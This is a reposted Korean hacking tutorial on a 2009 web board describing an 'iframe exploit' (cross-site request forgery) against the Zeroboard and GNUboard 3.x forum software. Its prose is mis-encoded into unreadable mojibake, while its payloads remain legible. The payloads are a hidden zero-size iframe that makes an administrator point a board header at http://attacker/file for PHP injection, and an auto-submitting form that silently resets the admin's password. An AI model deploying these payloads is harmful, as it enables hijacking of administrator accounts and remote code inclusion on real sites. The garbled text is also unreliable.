BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡

±Û¾´ÀÌ: À¥ GET,POST method+iframe tag Á¶È¸¼ö: 14097


0x00. ¹è°æ ¼³¸í
0x01. GET, POST method request¿Í iframe tag
0x02. ½ÇÁ¦ Àû¿ëµÇ´Â °ø°Ý
0x03. End


=======================================================================================


0x00. ¹è°æ ¼³¸í


µû·Î 'GET, POST method iframe exploit' À̶ó´Â À̸§À» ºÙÀÎ ÀÌÀ¯´Â ±âÁ¸ °ø°Ýµé°ú ±¸ºÐÀ» ÇÒ Çʿ伺À»
´À²¼±â ¶§¹®ÀÌ´Ù. ÇöÀç±îÁö À¥ÄÁÅÙÃ÷ ÇØÅ·±â¹ýÀº ¸¹Àº ¹ßÀüÀ» ÇØ¿Ô´Ù.
´Ü¼øÇÑ Cookie spoofing¿¡¼­ Cookie sniffing, ±Ù·¡ À¯¸í¼¼¸¦ Ÿ°í ÀÖ´Â XSS(Cross site script)±îÁö
¸Å¿ì ´Ù¾çÇÑ ¹æ¹ýÀ¸·Î °³ÀÎ »ç¿ëÀÚÀÇ Á¤º¸¸¦ À§ÇùÇØ¿Ô´Ù.
ÀÌ·¯ÇÑ °ø°Ý ±â¹ýÀº ¼­¹ö°¡ Ŭ¶óÀ̾ðÆ® ÃøÀÇ Á¤º¸¸¦ ¹«Á¶°ÇÀûÀ¸·Î ½Å·ÚÇϰųª Á¢¼Ó ÁßÀΠŬ¶óÀ̾ðÆ®ÀÇ
»óŸ¦ Á¡°ËÇÏÁö ¾Ê±â ¶§¹®¿¡ ÃæºÐÈ÷ ¹ß»ýÇÒ ¼ö ÀÖ¾ú´Ù.
±×·¯³ª ¼­¹ö¿¡¼­ Ŭ¶óÀ̾ðÆ® ÃøÀÇ Á¤º¸¿Í ÇÔ²² Ŭ¶óÀ̾ðÆ® »óŸ¦ Á¡°ËÇÑ´Ù¸é ÀÌ·¯ÇÑ °ø°Ý ±â¹ýµéÀº
ÃæºÐÈ÷ º¸¾ÈÀÌ °¡´ÉÇÏ´Ù. °£´ÜÈ÷ ¿¹¸¦ µç´Ù¸é, ÄíÅ° Á¤º¸¸¦ ¿äûÇϴ Ŭ¶óÀ̾ðÆ®°¡ ÇöÀç Á¤»óÀûÀ¸·Î
Á¢¼Ó ÁßÀÎÁö ¶Ç´Â, Á¢¼ÓµÇ¾î ÀÖ´Â IP¸¦ ±â·ÏÇÏ¿© ºñ±³ÇÏ´Â ¹æ¹ýµîÀÌ Á¸ÀçÇÑ´Ù.
ÀÌ·¯ÇÑ ¹æ¹ýÀ» ÅëÇØ °ø°ÝÀÚ°¡ Ŭ¶óÀ̾ðÆ®ÀÇ ÄíÅ°¸¦ ÀÌ¿ëÇÏ¿© ¼­¹ö¸¦ Á¢¼ÓÇÒ ¼ö ÀÖ´Â ¸ðµç °ø°ÝÀ»
Â÷´ÜÇÒ ¼ö ÀÖ´Ù.

±×·¡¼­ °í¾ÈµÈ °ø°Ý ±â¹ýÀÌ ¹Ù·Î 'GET, POST method iframe exploit'ÀÌ´Ù. ÀÌ ¹æ¹ýÀ» XSS³ª Cookie session
sniffing ±â¹ýµéó·³ ÇϳªÀÇ ÇØÅ· ±â¹ýÀ¸·Î Á¤ÀÇÇÏ°íÀÚ ÇÏ´Â ÀÌÀ¯´Â °ø°ÝÀÇ ´Ù¾çÇÑ ÀÀ¿ëÀÌ °¡´ÉÇϱâ
¶§¹®ÀÌ´Ù. ÀÌ ¹æ¹ýÀ» ±â¹ýÈ­ Çϱâ±îÁö ¿©·¯ ´Ù¸¥ À¥ ¾îÇø®ÄÉÀ̼ǵéÀ» Á¶»çÇغ» °á°ú ºñ½ÁÇÑ ¾Ë°í¸®ÁòÀ»
Áö´Ñ Ãë¾àÁ¡µéÀÌ Á¸ÀçÇÏ´Â °ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ¾ú´Ù.
¶ÇÇÑ ÀÌ ±â¹ýÀ» ÀÌ¿ëÇϸé À¥ »ç¿ëÀÚÀÇ Æнº¿öµå¸¦ º¯°æÇϰųª, °ü¸®ÀÚ ±ÇÇÑÀ» ȹµæÇÏ¿© °£Á¢ÀûÀ¸·Î ƯÁ¤
ÀÛ¾÷À» ¼öÇàÇÒ ¼ö Àֱ⠶§¹®¿¡, Cookie session sniffing ¸¸Å­ À¥º¸¾È¿¡ À§ÇùÀ» ÁÙ ¼ö ÀÖ´Ù.


0x01. GET, POST method request¿Í iframe tag


±âÁ¸ÀÇ XSS ±â¹ýÀ» ÀÌ¿ëÇÏ¿© script tag¿Í Àß ¿¬µ¿ÇÏ¸é ¸Å¿ì ÈǸ¢ÇÑ ±â¼úµéÀ» »ç¿ëÇÒ ¼ö ÀÖ´Ù.
'GET, POST method iframe exploit'Àº ÀÌ·± ±â¹ýµéº¸´Ù ÈξÀ ´õ ´Ü¼øÇÑ exploit methodÀÌ´Ù.
¸¶Áö¸·À¸·Î ·Î±×ÀÎÇÑ ÇØ´ç Ŭ¶óÀ̾ðÆ® »ç¿ëÀÚÀÇ IP¸¦ ÀúÀåÇÏ¿© ºñ±³ÇÏ´Â ¼ö´ÜÀ» ¿ìȸÇÏ´Â ¹æ¹ý¿¡ ´ëÇØ
»ý°¢Çغ¸µµ·Ï ÇÏÀÚ.

±×·¡¼­ ÀÛ¼ºµÈ °ø°ÝÀÇ °£´ÜÇÑ ½Ã³ª¸®¿À´Â ´ÙÀ½°ú °°´Ù.


1. ÇØ´ç »ç¿ëÀÚÀÇ ±ÇÇÑÀ» °£Á¢ÀûÀ¸·Î »ç¿ëÇϱâ À§ÇØ °¡Â¥ ¿äû¹®À» ¸¸µç´Ù.
2. ÀÌ ¿äû¹®À» <iframe> ű׸¦ ÀÌ¿ëÇÏ¿© »ç¿ëÀÚ°¡ Á¢¼ÓÇÒ ¼ö ÀÖµµ·Ï À¯µµÇÑ´Ù.
3. »ç¿ëÀÚÀÇ À¥ ºê¶ó¿ìÁ®¿¡¼­ iframe ű׸¦ ÅëÇØ ÇØÄ¿°¡ ¸¸µç °¡Â¥ ¿äû¹®ÀÌ ½ÇÇàµÈ´Ù.
4. ¿äû¹®ÀÇ ³»¿ëÀÌ ¼º°øÀûÀ¸·Î ¼öÇàµÇ¸é ¸ðµç ÀÛ¾÷Àº ³¡³­´Ù.


¿ì¼±, GET, POST method¸¦ »ç¿ëÇÒ ¼ö ÀÖ´Â À¥ ºê¶ó¿ìÁ®°¡ ÇÊ¿äÇÏ´Ù. ÀÌ À¥ ºê¶ó¿ìÁ®´Â ÇØÄ¿ÀÇ ÄÄÇ»ÅÍ°¡
¾Æ´Ñ °ø°ÝÀ» ´çÇÏ´Â »ç¿ëÀÚÀÇ ÄÄÇ»ÅÍ°¡ µÉ °ÍÀÌ´Ù. ÇØ´ç »ç¿ëÀÚ°¡ Á¢¼ÓÇÏ´Â À¥ »çÀÌÆ®¿¡¼­´Â ÇØÄ¿°¡
iframe ű׸¦ »ç¿ëÇÒ ¼ö ÀÖ¾î¾ß ÇÑ´Ù. XSS ±â¹ýÀº <script> ű׸¦ ÀÌ¿ëÇÏÁö¸¸, ÀÌ ±â¹ýÀº iframeÀ»
ÀÌ¿ëÇÑ´Ù. »ó´ë¹æÀÇ À¥ ºê¶ó¿ìÁ®¿¡¼­ ÇØÄ¿ÀÇ ¿äû¹®À» ½ÇÇàÇϹǷÎ, °ø°ÝÀÚÀÇ ÄÄÇ»ÅÍ¿¡¼­ µû·Î ¼öÇàÇÒ
°ø°ÝÀº ¾ø´Ù. ±×·¸±â ¶§¹®¿¡ ¼­¹ö´Â Á¤»óÀûÀÎ ¿äûÀ¸·Î ÇØ´ç »ç¿ëÀÚÀÇ ¿äû¹®À» ¼öÇàÇϸç, ±âÁ¸ÀÇ IP¸¦
ºñ±³ÇÏ¿© º¸¾ÈÇÏ´Â ¼ö´ÜÀ» ¸Å¿ì ½±°Ô ¿ìȸÇÒ ¼ö ÀÖ°Ô µÈ´Ù.

À§ ½Ã³ª¸®¿À¸¦ º¸°í ´ë·«ÀûÀÎ °ø°Ý ¹æ¹ýÀ» ¾Ë°Ô µÇ¾ú´Ù¸é, ´ç½ÅÀº Áö±Ý Áï½Ã ÀÌ °ø°Ý ±â¹ýÀ» ÀÌ¿ëÇÒ ¼ö
ÀÖ´Ù.


0x02. ½ÇÁ¦ Àû¿ëµÇ´Â °ø°Ý


* zeroboard °ø°Ý ¹æ¹ý


±¹³»¿¡¼­ °¡Àå ¸¹ÀÌ »ç¿ëµÇ´Â °Ô½ÃÆÇ Áß Çϳª°¡ ¹Ù·Î zeroboard ÀÌ´Ù. °ÅÀÇ ´ëºÎºÐÀÇ À¥ ¼Ö·ç¼ÇÀÌ iframe
tag¿¡ Ãë¾àÇϸç, À̸¦ ÀÌ¿ëÇÏ¿© °ø°ÝÀÚ´Â ÇØ´ç »ç¿ëÀÚÀÇ ±ÇÇÑÀ» ¾Ç¿ëÇÒ ¼ö ÀÖ´Ù.
±âÁ¸ zeroboard´Â ¼¼¼ÇÀ» ÀÌ¿ëÇÏ¿© »ç¿ëÀÚ¸¦ ÀÎÁõÇϴµ¥ IP¸¦ ºñ±³Çϱ⠶§¹®¿¡ ÄíÅ°³ª ¼¼¼ÇÀ» ÀÌ¿ëÇÑ °ø°Ý
±â¹ýÀ» Â÷´ÜÇÏ°í ÀÖ´Ù°í º¼ ¼ö ÀÖ´Ù. ±×·¸±â ¶§¹®¿¡ XSS¸¦ ÀÌ¿ëÇÏ¿© ÇØ´ç »ç¿ëÀÚÀÇ ¼¼¼ÇÀ» ¾ò¾î³½´ÙÇصµ
°ø°ÝÀ» ¼öÇàÇÒ ¼ö ¾ø´Ù. ÇÏÁö¸¸, iframe tag¸¦ ÀÌ¿ëÇÏ¸é °ü¸®ÀÚ À¥ ÅøÀ» Á¢±ÙÇÏ´Â °ÍÀÌ °¡´ÉÇϹǷΠÃæºÐÈ÷
°ø°ÝÀÌ °¡´ÉÇÏ´Ù.

¿ì¼± °ø°ÝÀÚ´Â iframe code ¾È¿¡ ³ÖÀ», GETÀ̳ª POST method·Î ¿äûÇÒ URL code¸¦ ÀÛ¼ºÇØ¾ß ÇÑ´Ù.
¾Æ·¡ ¿äû ºÎºÐÀº »ç½Ç POST method¸¦ ÀÌ¿ëÇÏ¿© Á¤º¸¸¦ º¸³»´Â zeroboard °ü¸®ÀÚ À¥ ÅøÀε¥ À̸¦ GET method·Î
±¸¼ºÇغ¸¾Ò´Ù.


--
http://host/bbs/admin_setup.php?exec=modify_group_ok&group_no=1&name=test&header_url=http://attacker/file
--


¿äû ³»¿ëÀº ¸Å¿ì °£´ÜÇѵ¥, ¿ì¼± ±×·ì ¹øÈ£ 1ÀÇ ±¸¸¨ À̸§À» test·Î º¯°æÇÑ ÈÄ, ±×·ì ¹øÈ£ 1¿¡ ÇØ´çµÇ¾î ÀÖ´Â
°Ô½ÃÆÇ Çì´õ ÆÄÀÏÀ» ¼öÁ¤ÇÏ´Â ³»¿ëÀÌ´Ù. À§ÀÇ URL code¸¦ ºÐ¼®Çغ¸¸é admin_setup.php·Î ³Ñ¾î°¡´Â Á¤º¸´Â ´ÙÀ½°ú °°´Ù.


--
exec º¯¼ö °ª: modify_group_ok
group_no º¯¼ö °ª: 1
name º¯¼ö °ª: test
header_url º¯¼ö °ª: http://attacker/file
--


À§ Á¤º¸¸¦ POST·Î º¸³»¸é °Ô½ÃÆÇ Á¤º¸°¡ ¼öÁ¤µÈ´Ù. ÇÏÁö¸¸, cookie, session spoofing °ø°ÝÀ» ¼öÇàÇÒ ¼ö ¾øÀ¸¹Ç·Î,
ÇØÄ¿´Â °ü¸®ÀÚ ÅøÀ» »ç¿ëÇÒ ¼ö ¾ø´Â »óÅÂÀÌ´Ù. ¹Ù·Î ¿©±â¼­ 'GET, POST method iframe exploit'À» ÀÌ¿ëÇÏ¸é °ü¸®ÀÚ°¡
Á÷Á¢ ¼öÁ¤À» Çϵµ·Ï °£Á¢ ¸í·ÉÀ» »ç¿ëÇÒ ¼ö ÀÖ´Ù.

iframe size¸¦ 0À¸·Î ¼³Á¤ÇÒ °æ¿ì ÆäÀÌÁö¿¡ ³ªÅ¸³ªÁö ¾Ê±â ¶§¹®¿¡ °ü¸®ÀÚ´Â Àڽŵµ ¸ð¸£°Ô zeroboard °ü¸®ÀÚ À¥ÅøÀ»
¼öÇàÇÏ°Ô µÈ´Ù. zeroboard °Ô½ÃÆÇÀ» °£´ÜÈ÷ ºÐ¼®Çغ» °á°ú, iframe exploit code¸¦ »ðÀÔÇÒ ºÎºÐÀ» ¿©·¯±ºµ¥ ¹ß°ßÇÒ ¼ö
ÀÖ¾úÀ¸¸ç, °¡Àå Æí¸®ÇÑ ¹æ¹ýÀ» ãÀ» ¼ö ÀÖ¾ú´Ù.


--
<iframe
src="http://host/bbs/admin_setup.php?exec=modify_group_ok&group_no=1&name=test&header_url=http://attacker/file"
height=0 width=0></iframe>¾È³çÇϼ¼¿ä ^^
--


À§¿Í °°Àº °ø°Ý Äڵ带 °ü¸®ÀÚ¿¡°Ô º¸³¾ ÂÊÁö Á¦¸ñÀ¸·Î ¼³Á¤ÇÑ´Ù. ±×·¯¸é, °ü¸®ÀÚ°¡ ÂÊÁö¸¦ Àо±â À§ÇØ ÂÊÁöÇÔ¿¡
Á¢¼ÓÇÒ °ÍÀÌ°í ÂÊÁö¸¦ ÀÐÁö ¾Ê¾Æµµ Á¦¸ñ¿¡¼­ iframe tag°¡ ¼öÇàµÇ±â ¶§¹®¿¡ ÇØÄ¿°¡ ¿øÇÏ´Â Äڵ带 ¼öÇàÇÒ ¼ö ÀÖ°Ô µÈ´Ù.
ÀÌÈÄÀÇ ÀÛ¾÷Àº ÀÚµ¿À¸·Î ±×·ì 1¿¡ ÇØ´çÇÏ´Â °Ô½ÃÆÇ Çì´õ°¡ ¸ðµÎ º¯°æµÉ °ÍÀ̸ç, ÀÌ ºÎºÐ¿¡¼­ PHP Injection exploitÀ»
¹ß»ý½Ãų ¼ö ÀÖ´Ù. iframe tag¸¦ 0À¸·Î ¼³Á¤Ç߱⠶§¹®¿¡ °ü¸®ÀÚ´Â °ø°ÝÀ» ´çÇß´ÂÁöµµ ¾ËÁö ¸øÇÏ°Ô µÈ´Ù.
À̸¦ ÀÀ¿ëÇϸé, °Ô½ÃÆÇ °ü¸®ÀÚÀÇ Á¤º¸ º¯°æ ¹× Æнº¿öµå º¯°æÀÌ °¡´ÉÇÏ´Ù.

±×·³, À̹ø¿£ POST method¸¦ ÀÌ¿ëÇÑ °Ô½ÃÆÇ °ø°Ý ¹æ¹ý¿¡ ´ëÇØ °£´ÜÈ÷ ¼³¸íÇϵµ·Ï ÇÏ°Ú´Ù. POST method °ø°Ý ¶ÇÇÑ,
GET method °ø°Ý ±â¹ý¸¸Å­ ¸Å¿ì °£´ÜÇÏ°Ô ÀÌ·ç¾î Áø´Ù.


* GNUboard 3.x °ø°Ý ¹æ¹ý


GNUboard °Ô½ÃÆÇÀ» °ø°ÝÇϱâ À§ÇØ ¿ì¼± ´ÙÀ½°ú °°Àº ³»¿ëÀÇ °ø°Ý Äڵ带 ÇØÄ¿ ÀÚ½ÅÀÇ À¥¼­¹ö¿¡ ¿Ã·ÁµÐ´Ù.


--
GNU board exploit

<form name=attack method=post action="http://host/gnu3/?doc=bbs/mbupdate.php&w=u&url=http://host/gnu3/?doc=bbs/mblogout.php&url=%2F%7Eboard%2Fgnu3%2F&mb_passwd=121212&mb_passwd_re=121212&mb_name=test&mb_passwd_q=12&mb_passwd_a=12&mb_email=s@s.x">
<input type=hidden name="mb_id" value="admin">
<script>attack.submit();</script>
--


POST method ¿äûÀ» üŷÇÏ´Â mb_id º¯¼ö¸¦ Á¦¿ÜÇÏ°í´Â ¸ðµÎ GET method ¿äûÀ¸·Î ÀÛ¼ºÇÏ¿´´Ù. ÀÌÁ¦ À§ Äڵ带 °Ô½ÃÆÇ¿¡
iframe tag size 0À¸·Î ¼³Á¤ÇÏ¿© ¾÷·Îµå ÈÄ, °ü¸®ÀÚ°¡ ÀÐÀ» ¶§±îÁö ±â´Ù¸®¸é µÈ´Ù. °ü¸®ÀÚ°¡ °Ô½Ã±ÛÀ» ÀоúÀ» ¶§´Â À̹Ì
°Ô½ÃÆÇÀÇ °ü¸®ÀÚÀÇ °³ÀÎ Á¤º¸, Æнº¿öµå Á¤º¸°¡ º¯°æµÇ¾î ÀÖÀ» °ÍÀÌ´Ù.


0x03. End


ÀÌ °ø°Ý ±â¹ýÀº ¸Å¿ì ¸¹Àº À¥ ÄÁÅÙÃ÷ ÇØÅ· ±â¹ý¿¡ µµ¿òÀ» ÁÙ °ÍÀÌ´Ù. °ø°ÝÀÇ º¸¾ÈÀº iframe tag »ç¿ëÀ» Á¶±â¿¡ Â÷´ÜÇÏ´Â
°ÍÀÌ´Ù. ÇÏÁö¸¸, script tag, ÇÏÀÌÆÛ ¸µÅ© tag, IMG ¸µÅ© tag¸¦ ÀÌ¿ëÇÒ °æ¿ì ÃæºÐÈ÷ Â÷´ÜµÈ ¼³Á¤À» ¿ìȸÇÏ¿© °ø°ÝÀÌ
°¡´ÉÇϹǷΠ¿øõÀûÀÎ °ø°ÝÀ» ºÀ¼âÇÒ ¼ö´Â ¾ø´Ù.


From À¯µ¿ÈÆ (Xpl017Elz) in INetCop.

°ü·Ã±Û : ¾øÀ½ ±Û¾´½Ã°£ : 2009/11/03 15:45 from 218.38.35.251

  SQL Injection ±âº» ¸ñ·Ïº¸±â »õ±Û ¾²±â Áö¿ì±â ÀÀ´ä±Û ¾²±â ±Û ¼öÁ¤ Chief CMS SQL injection  
BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡